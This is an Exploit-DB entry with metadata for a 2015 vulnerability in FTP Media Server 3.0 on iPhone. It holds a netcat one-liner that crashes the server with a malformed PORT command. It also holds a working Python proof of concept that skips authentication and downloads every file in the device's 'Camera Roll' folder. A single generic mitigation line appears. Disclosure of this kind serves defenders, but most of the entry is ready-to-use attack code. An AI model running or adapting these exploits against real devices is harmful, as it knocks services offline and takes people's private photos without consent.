FTP Media Server 3.0 - Authentication Bypass and Denial of Service

vendor:

FTP Media Server

by:

Wh1t3Rh1n0 (Michael Allen)

7.5

CVSS

HIGH

Authentication Bypass and Denial of Service

287

CWE

Product Name: FTP Media Server

Affected Version From: 3

Affected Version To: 3

Patch Exists: NO

Related CWE: N/A

CPE: a:ftp_media_server:ftp_media_server:3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: iPhone

2015

FTP Media Server 3.0 – Authentication Bypass and Denial of Service

The FTP server does not properly handle errors raised by invalid FTP commands. The following command, which sends an invalid PORT command to the FTP server, will crash the server once it is received. The FTP server does not handle unauthenticated connections or incorrect login credentials properly. A remote user can issue commands to the FTP server without authenticating or after entering incorrect credentials.

Mitigation:

Ensure that the FTP server is properly configured to handle invalid commands and unauthenticated connections.

Source

Exploit-DB raw data:

#!/usr/bin/env python
#==================================================================================
# Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service
# Date: 2015-05-25
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Exploit Author's Homepage: http://www.mikeallen.org
# Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302
# Version: 3.0
# Tested on: iPhone
#==================================================================================
# ------------------
# Denial of Service:
# ------------------
# The FTP server does not properly handle errors raised by invalid 
# FTP commands. The following command, which sends an invalid PORT command to 
# the FTP server, will crash the server once it is received.

# echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000

# ----------------------
# Authentication Bypass:
# ----------------------
# The FTP server does not handle unauthenticated connections or incorrect login
# credentials properly. A remote user can issue commands to the FTP server 
# without authenticating or after entering incorrect credentials.

# The following proof-of-concept connects to the given FTP server and 
# downloads all files stored in the "Camera Roll" folder without providing a
# username or password:

import sys
from ftplib import FTP

if len(sys.argv) <= 1:
    print "Usage: ./ftp-nologin.py [host] [port]"
    exit()

host = sys.argv[1]    
port = int(sys.argv[2])

files = []

def append_file(s):
    files.append(s.split(' ')[-1])

blocks = []
def get_blocks(d):
    blocks.append(d)

ftp = FTP()
print ftp.connect(host, port)
ftp.set_pasv(1)
ftp.cwd("Camera Roll")
print ftp.retrlines('LIST', append_file)

files.pop(0)

for filename in files:
    print "Downloading %s..." % filename
    ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks)

    f = open(filename, 'wb')
    for block in blocks:
        f.write(block)
    f.close()
    print "[+] File saved to: %s" % filename
    
    blocks = []

ftp.quit()